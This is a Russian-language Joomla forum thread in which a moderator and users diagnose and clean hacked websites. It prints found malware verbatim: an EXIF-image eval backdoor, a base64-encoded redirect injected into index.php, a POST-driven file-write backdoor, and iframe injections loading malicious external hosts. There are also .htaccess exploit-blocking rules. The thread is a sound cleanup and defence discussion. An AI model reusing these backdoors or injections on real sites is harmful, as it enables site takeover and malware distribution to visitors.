0 Пользователей и 1 Гость просматривают эту тему.
  • 790 Ответов
  • 219009 Просмотров
*

flyingspook

  • Moderator
  • 3619
  • 236
Просьба все коды вирусов вставлять картинками преобразовать код в картинку можно в любом сервисе вот один из них

Решил добавлять важное и свежее сверху топика

Добавлено 11-05-2014
*****************************************************************************************************
Как защитить сайт?
Задают один вопрос, как обезопасить версию 1.5.* разницы нету в версиях, вот рекомендации которые помогают защите сайта

- обновите сайт до 1.5.26
- обновите медиа менеджер последней заглушкой
- если сайт без регистрации поставьте права на закачку файлов администратору
- закройте папки htaccess на запрет выполнения скриптов
- закройте панель управления бейсик авторизацией

какие расширения стоят не могу угадать у каждого они разные, но их требуется просмотреть и если требуется обновить

этого должно хватить


Добавлено 08-06-2013
*****************************************************************************************************
Последнии чистки и обращения за помощью показывают, что начали делать все по другому, принцип старый метод тоже не новый  ;D
В файл *.php дописывается строка, но не с закодированным кодом как все привыкли, а с вложением кода из файла
Код
@include_once('/home/.../language/posanted75.php'); 

как видим залитый файл с подом просто подгружен и при удалении файла сайт начинает частично или весь не работать, следует удалять все такие вставки из *.php файлов, это просто замена base64 на include_once
!Важно это только примеры и нет возможности описывать и расписывать все сигнатуры, да и файлы заливаются куда угодно и названия какие угодно могут быть

Далее, ну то что мне нравиться больше всего старо как не знаю что, но многие "помешавшись на за кодированности" вставок в файлах и криками "помогите что делать"  ^-^ про это совсем забыли или даже не знают

Разбор полета
1 - в картинку в зоголовок вставляют backdoor выглядит примерно так
Код
/.*/e eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
2 - в определенном файле вставляется код для подключения и прочтения заголовка из этой картинки
Код
$exif = exif_read_data('/home/.../images/stories/***.jpg');
preg_replace($exif['Make'],$exif['Model'],'');
3 - обратившись к файлу с таким кодом, который читает такой заголовок, у такой картинки, получают полный доступ к сайту через, этот мини shell

!Важно Все это прописывают до кода безопасности
Код
define(  );
или в файлах где его нету

Тестирую нововведения  :laugh: все новое это не все хорошо забытое старое

Будьте при чистках внимательны.
*****************************************************************************************************


Решили создать отдельный топик прикрепить и вести все вопросы и ответы в нем.
Все вопросы связанные с лечением сайтов от вируса будут только в одной теме, просьба писать их здесь.
Прежде чем писать вопрос прочитать топик и раздел безопасности, на многие вопросы уже есть ответы.
Отныне все темы созданные про вирус, как лечить сайт и что делать будут удаляться.

Распишу основу, к примеру что происходит в основном в последнее время, как с этим и вообще бороться.

Все зависит от Ваших знаний и умений. Есть сканера для поиска shell, есть скрипты для поиска и перезаписи файлов на сервере, есть ssh и команды для работы на сервере. Начну писать самое простое это FTP и файлы, тут требуется меньше знаний, но больше времени.

Многие знают что:
-находят уязвимости
-загружают через них shell
-заражают файлы вписывая редирект

Поиск и удаление

Главное понимание того, что если сайт на хосте не один, то искать и чистить надо все, shell может быть на соседнем сайте и заражать не тот сайт, а только какой то определенный из соседних, и все думают, что зараза только на том что редиректит или ПС его блокирует
99% - Это Ваше первая ошибка и заблуждение



- смотрим дату измененных файлов
- смотрим логи сервера, смотрим обращение в это время к каким файла

важно! при работе надо закрывать доступ к сайту или делать все локально скачав файлы

- если не видим то, берем сканер поиска shell он покажет файлы которые надо просмотреть на наличие записанного shell-а, после того как нашли, так же потом смотрим логи по этому времени, для чего смотреть да для того чтоб увидеть через что попал shell и закрыть эту дверь (последние через что заливают это редактор JCE, менеджер расширений nonumber.nl, ну и старые не актуальные версии joomla)
- найдя и удалив shell переходим к удалению вредного кода, он может быть в файлах .htaccess, *.js, *.php
в .htaccess дописывается обычно "партянка" редиректов ее сразу видно
в *.js дописывается обычно в конец файла
Спойлер
[свернуть]
в *.php дописывается обычно в начало или ко всем <?php
Спойлер
[свернуть]
код могут дописать и в большинстве случаев, пишут за экран с большим отступом в право

это расписано простое направление в какую сторону двигаться, поймите все случаи разные и индивидуального характера, Ваш может быть другим, но смысл один

Как чистить файлы
- по найденному коду делать поиск найденного кода и его замену, любой программой если локально начиная от Notepad++ и теми программами которые могут вести поиск и замену в файлах, если на хостинге, то делать это скриптом поиска и замены
- возможно сделать это и по другому если вы полностью уверены что файлы сайта не изменялись то можно просто пере залить чистые файлы сверху зараженных от версии которая у вас

Как избежать
Про это пишут все и всегда и очень много
- делать постоянно бэкапы
- своевременное обновление как CMS так и всех расширений
- создавать пароли из букв (прописных и заглавных) и цифр, возможно использовать символы, чем длиннее тем лучше, это на случай брута админки
- взять за правило менять пароли, хоста, ftp, админки, и даже бд и это не параноя, а простое правило
- вести логи сервера с ротацией и чем больше срок их хранения тем лучше

те кто пишет что "мол у меня три года сайту и я не обновлялся" и "ни чего не было" им просто повезло, но в дальнейшем везти не будет с каждым днем просто находятся новые дыры и растут взломы, становится много сайтов и так же много тех кто ломает их
Чтобы избежать этого требуется следить за сайтами ежедневно работать, сайт это уже работа или хобби, на которые требуется тратить ежедневно время

Думаю если кто либо в топике распишет как он боролся именно у себя с проблемой заражения, то получиться более развернутое описание и описаны будут многие случаи более развернуто.

Вроде доступно написал без всяких терминов для тех кто ни понимает что такое shell (многие думают что вирус)

Цитировать
shell - утилита на подобии файлового менеджера, для удаленного подключение и удобной работы с файлами, это не вирус "черный вход", возможность пользования как из браузера так и с командной строки, ваши пароли если его залили не помеха(не требуется ему ftp и админка) это своего рода панель так которой вы пользуетесь на хостинге, там есть доступ как к файлам так и к БД, вы читаете про вирусный код и про код редиректов, shell ни какого отношения не имеет к ним, эту утилиту только могут закодировать в base64, но такое редко профи его кодируют по другому, shell также может находиться на другом сервере а у вас использоваться короткий код подключения к нему

Что требуется еще:

Права на папки и файлы ставим правильно

Как заливают shell:

Все просто нового ни чего не изобрели и не изобретут(хотя возможно но нет уверенности)
файл с shell заливается в основном в папки
Цитировать
images
images/stories
tmp

заливают либо сразу файл shell, либо "якобы картинку" файл с кодом и с расширением от изображения, который после загрузки либо остается таким же или ему меняют расширение, если он остается картинкой то тогда в этой директории появляется еще и файл .htaccesss для того чтоб этот файл работал


В конце того года появились новые вставки кода, для тех кто не знает опишу, в файлы движка либо просто в сторонние файлы (чаще всего) вставляется код

Спойлер
[свернуть]

или

Спойлер
[свернуть]

или еще множество вариантов исполнения, многие уже знают об этом кто то нет, файлов отношение которые не имеют к движку может быть сотни и названия у них разные у всех, так что могу только посочувствовать тем кто не понимает PHP и сам пытается что то найти и удалить месяцами.

Встречается случаи когда кеш системы не чистится, и после чистки файлов все равно нет результата
один из способов это почистить в БД таблицу #_session  не всегда помогает на 100%, видимо еще и кешируется у провайдера или на каких либо удаленных серверах
« Последнее редактирование: 28.09.2014, 00:08:02 от flyingspook »
*

maxis

  • Осваиваюсь на форуме
  • 106
  • 1
Вот этот гад размножается. Что он вообще делает? Где его удить? Сканом проверил, но всё чисто, а эта штука осталась.
Спойлер
[свернуть]

Что он вообще делает?

+ предлагаю сделать мануал для чайников, меньше тема будет и информативнее.
« Последнее редактирование: 22.01.2013, 18:06:00 от maxis »
*

makc9I

  • Осваиваюсь на форуме
  • 90
  • 0
Спойлер
[свернуть]

еще что-то вредное в скрипте имеется кроме?
Код
;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://ljobopt.ddns.name/6a7f155e1b2a6f3c6bdeeeffd6cee592.2uihdSzvEzrUgFy?default" height="120" width="120"></iframe>');

Правильно ли я понял, что нужно удалить эту строку из всех зараженных файлов и прогнать антивирем снова, если найдет что-то еще, но меньше, выискивать еще строки и повторить процесс?
*

flyingspook

  • Moderator
  • 3619
  • 236
эта строка дописана у вас не в один файл(содержимое может меняться), она выводит вредоносное ПО с сайта донора

Цитировать
;document.write('<iframe***
смотрите в конце *.js файлов
*

makc9I

  • Осваиваюсь на форуме
  • 90
  • 0
в Notepad++ заменил вредоносный код
Цитировать
document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://ljobopt.ddns.name/6a7f155e1b2a6f3c6bdeeeffd6cee592.2uihdSzvEzrUgFy?default" height="120" width="120"></iframe>');
на пробел
Стало чуть легче. Теперь 54 угрозы.
Аналагично вычленил еще один айфрейм, довел до 7 угроз. Допустим, доведу дело до конца. Как действовать в дальнейшем? Как обезопасить сайт от повторных угроз? Пароли на админке/хостинге сменил. Позже сменю пароль на бд
*

makc9I

  • Осваиваюсь на форуме
  • 90
  • 0
Угроз не обнаружено, какие будут советы?
*

makc9I

  • Осваиваюсь на форуме
  • 90
  • 0
вернул сайту работоспособность, но он все равно редиректит на какой-то левак при заходе с планшета на андройде. Удалил файл .htaccess с кучей строк со словами REDIRECT, и больше ни с чем. Не помогло
*

flyingspook

  • Moderator
  • 3619
  • 236
*

makc9I

  • Осваиваюсь на форуме
  • 90
  • 0
каждый файлик смотреть руками без каких-либо методов автоматизации или существует некий алгоритм?
*

maxis

  • Осваиваюсь на форуме
  • 106
  • 1
смотрите сторонний код в файлах *.php закодированный в base64

Уважаемый, напишите, пожалуйста, алгоримт действия shell. Вы ведь знаете о чём пишете. Все остальные как слепые котята ищут каждый на своём сайте и задают одни и те же вопросы. Или ссылку на описание в интернете, чтобы подготовить бойца. Тогда с этой информацией даже начинающим будет понятно, где искать и как правильно защищать сайты. А так же вопросы будут адекватные (подготовленные).

Лично я с помощью fls.php, только на третьей ветке форума случайно понял на что надо обращать внимание, а так нигде никаких комментариев - запускай и всё будет ок. Цель форума - собирать знание и давать его незнающим, а не реализовывать амбиции.

Заранее благодарю за понимание, прошу прощения за оффтоп.
После прочтения сжечь, не обижусь :-)
« Последнее редактирование: 23.01.2013, 10:41:42 от maxis »
*

GWork

  • Осваиваюсь на форуме
  • 123
  • 1
Уважаемые, вот нашел файлы в images и component/com_content с названиями - cart.skitch , .a7qsns.php, .mkbiyh.php
Скачать и посмотреть можно в архиве.

Надеюсь это он генерил вредокод в i'frame
_____________________________________
На данный момент вредоносного кода не замечано - ищете аналогичные файлы, сносите и делайте бэкап (т.к. некоторые файлы js испорчены или просто пустые), если не было изменений на сайтах. Я делаю бэкап за 16 число, вирус был замечен 19. Все гуд вроде.

[вложение удалено Администратором]
« Последнее редактирование: 23.01.2013, 15:52:56 от GWork »
*

goral

  • Осваиваюсь на форуме
  • 31
  • 0
Здравствуйте!
Вопрос по вирусу.
Сегодня обнаружил вирус на двух сайтах.
Точнее изменились файлы в главной директории, а именно - index.php, COPYRIGHT.php.
Также в главной директории появился файл - sejeal.jpg
Сайт на Joomla 1.5.25

Ситуации очень похожа на эту
http://forum.joomla.org/viewtopic.php?f=432&t=787405

Выкладываю содержание файла index.php (измененный вирусом)
<? eval(base64_decode('ZGVmaW5lKCAnX0pFWEVDJywgMSApOwoKZGVmaW5lKCdKUEFUSF9CQVNFJywgZGlybmFtZShfX0ZJTEVfXykgKTsKCmRlZmluZSggJ0RTJywgRElSRUNUT1JZX1NFUEFSQVRPUiApOwoKcmVxdWlyZV9vbmNlICggSlBBVEhfQkFTRSAuRFMuJ2luY2x1ZGVzJy5EUy4nZGVmaW5lcy5waHAnICk7CmV2YWwoYmFzZTY0X2RlY29kZSgnYUdWaFpHVnlLQ0pTWldaeVpYTm9PaUF5TlRzZ2RYSnNQVndpYUhSMGNEb3ZMM05vYjNCbWIzSjZZUzVwYm1adkwyNWxkRndpSWlrNycpKTsKcmVxdWlyZV9vbmNlICggSlBBVEhfQkFTRSAuRFMuJ2luY2x1ZGVzJy5EUy4nZnJhbWV3b3JrLnBocCcgKTsKCkpERUJVRyA/ICRfUFJPRklMRVItPm1hcmsoICdhZnRlckxvYWQnICkgOiBudWxsOwoKCiRtYWluZnJhbWUgPSYgSkZhY3Rvcnk6OmdldEFwcGxpY2F0aW9uKCdzaXRlJyk7CgoKJG1haW5mcmFtZS0+aW5pdGlhbGlzZSgpOwoKSlBsdWdpbkhlbHBlcjo6aW1wb3J0UGx1Z2luKCdzeXN0ZW0nKTsKCgpKREVCVUcgPyAkX1BST0ZJTEVSLT5tYXJrKCdhZnRlckluaXRpYWxpc2UnKSA6IG51bGw7CiRtYWluZnJhbWUtPnRyaWdnZXJFdmVudCgnb25BZnRlckluaXRpYWxpc2UnKTsKCgokbWFpbmZyYW1lLT5yb3V0ZSgpOwoKCiRJdGVtaWQgPSBKUmVxdWVzdDo6Z2V0SW50KCAnSXRlbWlkJyk7CiRtYWluZnJhbWUtPmF1dGhvcml6ZSgkSXRlbWlkKTsKCgpKREVCVUcgPyAkX1BST0ZJTEVSLT5tYXJrKCdhZnRlclJvdXRlJykgOiBudWxsOwokbWFpbmZyYW1lLT50cmlnZ2VyRXZlbnQoJ29uQWZ0ZXJSb3V0ZScpOwoKCiRvcHRpb24gPSBKUmVxdWVzdDo6Z2V0Q21kKCdvcHRpb24nKTsKJG1haW5mcmFtZS0+ZGlzcGF0Y2goJG9wdGlvbik7CgoKSkRFQlVHID8gJF9QUk9GSUxFUi0+bWFyaygnYWZ0ZXJEaXNwYXRjaCcpIDogbnVsbDsKJG1haW5mcmFtZS0+dHJpZ2dlckV2ZW50KCdvbkFmdGVyRGlzcGF0Y2gnKTsKCgokbWFpbmZyYW1lLT5yZW5kZXIoKTsKCgpKREVCVUcgPyAkX1BST0ZJTEVSLT5tYXJrKCdhZnRlclJlbmRlcicpIDogbnVsbDsKJG1haW5mcmFtZS0+dHJpZ2dlckV2ZW50KCdvbkFmdGVyUmVuZGVyJyk7CgoKZWNobyBKUmVzcG9uc2U6OnRvU3RyaW5nKCRtYWluZnJhbWUtPmdldENmZygnZ3ppcCcpKTs='));?>

После раскодировки выглядит следующим образом

define( '_JEXEC', 1 );

define('JPATH_BASE', dirname(__FILE__) );

define( 'DS', DIRECTORY_SEPARATOR );

require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
eval(base64_decode('aGVhZGVyKCJSZWZyZXNoOiAyNTsgdXJsPVwiaHR0cDovL3Nob3Bmb3J6YS5pbmZvL25ldFwiIik7'));
require_once ( JPATH_BASE .DS.'includes'.DS.'framework.php' );

JDEBUG ? $_PROFILER->mark( 'afterLoad' ) : null;


$mainframe =& JFactory::getApplication('site');


$mainframe->initialise();

JPluginHelper::importPlugin('system');


JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
$mainframe->triggerEvent('onAfterInitialise');


$mainframe->route();


$Itemid = JRequest::getInt( 'Itemid');
$mainframe->authorize($Itemid);


JDEBUG ? $_PROFILER->mark('afterRoute') : null;
$mainframe->triggerEvent('onAfterRoute');


$option = JRequest::getCmd('option');
$mainframe->dispatch($option);


JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
$mainframe->triggerEvent('onAfterDispatch');


$mainframe->render();


JDEBUG ? $_PROFILER->mark('afterRender') : null;
$mainframe->triggerEvent('onAfterRender');


echo JResponse::toString($mainframe->getCfg('gzip'));


После дальнейшей раскодировки

header("Refresh: 25; url=\"http://shopforza.info/net\"");

Далее выкладываю содержание файла COPYRIGHT.php

Restricted accoss
<?php
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
$file = "".$_POST["path"];
$fh = fopen ($file, 'w') or die("");
echo fwrite ($fh, stripslashes($_POST["raw_data"]));
fclose($fh);

Далее описываю, как ведет себя сайт с этими кодами:
через несколько секунд перебрасывает на другой сайт.

Сейчас я удалил файл sejeal.jpg и перезаписал из архива
файлы index.php и COPYRIGHT.php

Понимаю, что это временная мера. Все может повториться.
Поэтому нужен совет, что делать дальше.

Выкладываю также содержание файла ошибок сервера.
Вот он

[Wed Jan 23 01:18:42 2013] [error] [client 77.91.203.82] client denied by server configuration: /home/virtwww/имя_на_сервере/http/susu.php
[Wed Jan 23 01:18:43 2013] [error] [client 77.91.203.82] client denied by server configuration: /home/virtwww/имя_на_сервере/http/susu.php
[Wed Jan 23 01:29:55 2013] [error] [client 77.91.203.82] client denied by server configuration: /home/virtwww/имя_на_сервере/http/susu.php
[Wed Jan 23 02:31:18 2013] [error] [client 80.74.139.3] client denied by server configuration: /home/virtwww/имя_на_сервере/http/COPYRIGHT.php
[Wed Jan 23 04:36:33 2013] [error] [client 46.119.35.188] File does not exist: /home/virtwww/имя_на_сервере/http/index.php\t20, referer: http://сайт/index.php%0920

Также выкладываю содержание файла .htaccess
(сейчас, когда пишу - смотрю, а этого файла инет,
хотя с утра был. Сейчас опять его записал на сайт)

Options +FollowSymLinks
RewriteEngine On
RewriteCond %{HTTP_HOST} ^www.сайт\.com$ [NC]
RewriteRule ^(.*)$ http://сайт.com/$1 [R=301,L]
ErrorDocument 404 http://сайт.com/index.php?option=com_content&view=article&id=2813
ErrorDocument 500 http://сайт.com/error500.html
ErrorDocument 503 http://сайт.com/error503.html

# Включаем сжатие
<IfModule mod_deflate.c>
  <FilesMatch "\.(css|js|x?html?|php)$">
    SetOutputFilter DEFLATE
  </FilesMatch>
</IfModule>

##### Start ?tp=1 prevention######
RewriteCond %{QUERY_STRING} tp=(.*)
RewriteRule ^(.*)$ index.php [F,L]
##### End ?tp=1 prevention ######

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension XML files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension XML files
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode data within the URL
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Return 403 Forbidden header and show the content of the root homepage
RewriteRule ^(.*)$ index.php [F,L]
ErrorDocument 403 http://сайт.com/
#
########## End - Rewrite rules to block out some common exploits

# Включаем кэширование
<IfModule mod_expires.c>
  ExpiresActive On
  ExpiresDefault "access plus 3600 seconds"
  ExpiresByType image/x-icon "access plus 3600 seconds"
  ExpiresByType image/jpeg "access plus 3600 seconds"
  ExpiresByType image/png "access plus 3600 seconds"
  ExpiresByType image/gif "access plus 3600 seconds"
  ExpiresByType application/x-shockwave-flash "access plus 3600 seconds"
  ExpiresByType text/css "access plus 3600 seconds"
  ExpiresByType text/javascript "access plus 3600 seconds"
  ExpiresByType application/x-javascript "access plus 3600 seconds"
  ExpiresByType text/html "access plus 3600 seconds"
  ExpiresByType application/xhtml+xml "access plus 3600 seconds"
</IfModule>

# Удаляем заголовок Last-Modified
<ifModule mod_headers.c>
  Header unset Last-Modified
</ifModule>

# Добавляем управляющие команды для кэширущих систем
<IfModule mod_headers.c>
  <FilesMatch "\.(ico|jpe?g|png|gif|swf)$">
    Header set Cache-Control "max-age=3600, public"
  </FilesMatch>
  <FilesMatch "\.(css)$">
    Header set Cache-Control "max-age=3600, public"
  </FilesMatch>
  <FilesMatch "\.(js)$">
    Header set Cache-Control "max-age=3600, private"
  </FilesMatch>
  <FilesMatch "\.(x?html?|php)$">
    Header set Cache-Control "max-age=3600, private, must-revalidate"
  </FilesMatch>
</IfModule>

# Выключаем проверку объектных тегов ETag
<ifModule mod_headers.c>
  <filesMatch "\.(ico|pdf|flv|jpg|jpeg|png|gif|js|css|swf)$">
    Header unset ETag
    FileETag None
 </filesMatch>


Надеюсь, кто-то сможет помочь.
Оптимистично и креативно по жизни
*

goral

  • Осваиваюсь на форуме
  • 31
  • 0
Хочу добавить.
На втором сайте, на котором такая же история,
тоже пропал файл .htaccess
Сейчас его восстановил.
О чем это может говорить? Как этот файл может пропадать?
Оптимистично и креативно по жизни
*

goral

  • Осваиваюсь на форуме
  • 31
  • 0
Под JCE подразумевается текстовый редактор? Да стоит
Оптимистично и креативно по жизни
*

goral

  • Осваиваюсь на форуме
  • 31
  • 0
Еще добавлю.
1. FTP уже почти год не пользуюсь. Тогда тоже сайт ломали.
Поэтому перешел на WinSCP
2. На обоих сайтах стоит защита на папку administrator
На одном сайте - через плагин с кодовым слом.
На другом сайте - через файл .htaccess
Оптимистично и креативно по жизни
*

goral

  • Осваиваюсь на форуме
  • 31
  • 0
Я просмотрел файлы этого компонента на сайте. Все даты старые.
Какие есть еще варианты или может подскажите где копать.
Версия JCE 1.5.7.4
Оптимистично и креативно по жизни
*

flyingspook

  • Moderator
  • 3619
  • 236
Цитировать
Версия JCE 1.5.7.4
обновите до актуальной
и ищите залитый shell
плюс сам бдижок обновите до 1.5.26
*

goral

  • Осваиваюсь на форуме
  • 31
  • 0
1. Подскажите как искать shell
2. Нашел в папке tmp файл php.class.php
Хотел скопировать его содержание,
но вставляется только это - яШяа
Остальное видно в Notepad+, но не копируется
Подскажите как прикрепить файл?


Оптимистично и креативно по жизни
*

draff

  • Практически профи
  • 2770
  • 171
  • step by step
Лично я с помощью fls.php, только на третьей ветке форума случайно понял на что надо обращать внимание, а так нигде никаких комментариев - запускай и всё будет ок.
Так может сначала узнать как устроена самая простая функция защиты в CMS Joomla , а потом искать бекдор с помощью сканера.
Вопрос-зачем в файлах .php Joomla проверяется определение константы ?
defined('_JEXEC')
*

goral

  • Осваиваюсь на форуме
  • 31
  • 0
Joomla обновил до 1.5.26
JCE обновил до 2.3.1
Есть ли у кого замечания по файлу .htaccess ?
Оптимистично и креативно по жизни
*

flyingspook

  • Moderator
  • 3619
  • 236
Цитировать
Так может сначала узнать как устроена самая простая функция защиты в CMS Joomla , а потом искать бекдор с помощью сканера.
Вопрос-зачем в файлах .php Joomla проверяется определение константы ?
defined('_JEXEC')

Последние взломы сейчас дописывают в системные файлы выше defined('_JEXEC') код(как сами понимаете код может быть любого содержания), просматривать требуется все файлы.
*

Polosat

  • Давно я тут
  • 203
  • 7
  • Мечты - это то, из чего сделано будущее
Уфф, до этого справлялся теперь что то никак

вычистил кучу заразы, обновил, поправил .htaccess, выполнил рекомендации с форума и один фиг через если открывать через поиск яндекса, происходит редирект, если открывать напрямую то все нормально

****

Код
редирект идёт на http://ds-konzepte.info/libraries/pear/arch/pages/if.php

кто нибудь поборол аналогичную заразу?
« Последнее редактирование: 07.02.2013, 22:11:41 от Polosat »
*

Aleks45

  • Осваиваюсь на форуме
  • 36
  • 0
Всем привет, помогите победить вирус, Google уже одел кандалы, в панели вебмастера пишет следующие ошибки:
media/system/js/mootools.js

(document.write('<iframe width="55" height="55" style="width:
100px;height:100px;position:absolute;left:-100px;top:0;" src
="http://bxprgiui.qhigh.com/geowgjwiehgwvbb.cfg?11"></iframe
>');)

http://schet-oplata.ru/component/comprofiler/registers.html проверки этой страницы сервер возвратил содержание, которое переадресовывает браузер на сайт, распространяющий вредоносное ПО и у этой странице точно такая же ситуация http://schet-oplata.ru/karta-sayta.html

Помогите разобраться, буду очень признателен
*

maxis

  • Осваиваюсь на форуме
  • 106
  • 1
файлы по новой не заражаются *.js  и *.php

Т.е. если я где-то убрал лишний код, то он не вернётся? Кроме JCE дыры где-нибудь ещё есть (из основных)?

Глупый вопрос, а можно в первое сообщение добавить ссылку на актуальную версию и написать актуальную версию. Все сразу будут знать...
« Последнее редактирование: 24.01.2013, 12:34:55 от maxis »
*

Polosat

  • Давно я тут
  • 203
  • 7
  • Мечты - это то, из чего сделано будущее
файлы по новой не заражаются *.js  и *.php

так в этом и вопрос, все вычистил, скачал сайт, перепроверил, вычистил по новой, а зараза все равно где то сидит.

Можно каким то образом посмотреть каким образом идёт редирект?
*

flyingspook

  • Moderator
  • 3619
  • 236
@Aleks45
у вас дописано в .js файлах в конце ;(document.write('<iframe и код
смотрите их

Цитировать
так в этом и вопрос, все вычистил, скачал сайт, перепроверил, вычистил по новой, а зараза все равно где то сидит.
а файлы то чистые или она по новой записывается, если по новой то надо искать shell, если файлы чистые то почистить кеш для начало и смотреть что могло остаться
« Последнее редактирование: 24.01.2013, 13:36:33 от flyingspook »
*

Aleks45

  • Осваиваюсь на форуме
  • 36
  • 0
@flyingspook
я удалял этот код несколько раз, он снова появляется в других js. файлах, как искать shell?? не разу этого не делал, может ты сможешь помочь найти эту гадину? я бы заплатил тебе, пиши в личку
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

опять вирус \?

Автор mami_

Ответов: 15
Просмотров: 170
Последний ответ 07.09.2017, 06:20:29
от voland
Вирус, который виден только в кэше поисковых систем

Автор silavoli

Ответов: 12
Просмотров: 1161
Последний ответ 19.07.2017, 09:57:20
от flyingspook
Поймали вирус trojan.inject.21 как лечить

Автор nick2202

Ответов: 3
Просмотров: 390
Последний ответ 14.07.2017, 17:31:00
от voland
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 99
Просмотров: 46698
Последний ответ 05.07.2017, 15:18:57
от revisium
Вирус в виде рекламы на сайте

Автор yasna

Ответов: 10
Просмотров: 298
Последний ответ 08.06.2017, 18:38:43
от winstrool